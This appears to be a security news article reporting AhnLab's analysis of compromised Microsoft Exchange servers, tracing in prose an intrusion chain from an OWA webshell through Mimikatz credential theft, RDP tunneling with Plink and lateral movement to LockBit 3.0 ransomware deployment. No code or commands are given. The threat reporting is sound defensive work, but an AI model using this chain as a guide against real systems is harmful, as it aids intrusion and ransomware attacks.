Last week two zero-day flaws, CVE-2022-41040 and CVE-2022-41082, impacting Microsoft Exchange Server were revealed by the Vietnamese security firm GTSC. Microsoft later added the confirmation that the zero-day flaws affecting Microsoft Exchange Server 2013, 2016, and 2019 are being used in the wild.
Two of the impacted Exchange servers were examined by AhnLab, a Korean cyber threat analysis company, and it was discovered that they were compromised with LockBit 3.0 ransomware, and that the AD admin account had been compromised. The main finding of the AhnLab research was that the attack scenario or pattern used on the Exchange server was distinct from the zero days flaws discovered earlier. It is assumed that the attacker employed a different zero-day vulnerability based on the attack technique, the created WebShell file name, and further attacks following WebShell generation. The AhnLab research claims that users may be vulnerable to attacks due to an unpatched vulnerability in Microsoft Exchange Server. After uploading WebShell, ransomware was installed on the computers and AD administrator accounts were quickly taken over.
How it works?
The WebShell was uploaded to the OWA folder, and it has System privileges. The Mimikatz infection was used by the attacker with system privileges to steal the passwords for the Administrator and Exchservice AD administrator accounts.
The attacker created and ran scripts and applications for tunneling using WebShell. When you execute the produced r.bat script, RDP is enabled by editing the registry and the RDP firewall policy is authorized. Then, the tunneling application p64.exe (Plink) is launched to connect the local 3389 address to the remote server address (RDP). Bypassing the company’s firewall, this enables external RDP access to the internal network system.
The attackers got into the victim’s internal networks using a variety of tactics including administrative utility tools. To avoid being discovered by the antivirus software, the attackers constructed and utilized Windows batch files that contained common system commands like wmic and copy, as well as commercial software for administrative functions. Using the network scanning tool netscan, the attacker compiled a list of internal systems. After obtaining an account with AD administrator rights (ExchService, Administrator) using the Mimikatz software, the attacker used a variety of tactics to get access to internal systems.
Using RDP to connect and TeamViewer for remote access
use the copy command to copy distant files
executing a command remotely Using Psexec and WMIC Remote Command Execution
The ransomware was distributed by the attacker via a script in the form of a Windows batch file.
There is currently no formal confirmation that AhanLab’s findings vary from the previously published exchange zero days, nor has any new CVE been registered or made public by MITRE. If this turns out to be different, then the Microsoft Exchange Server may have another zero-day flaw.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.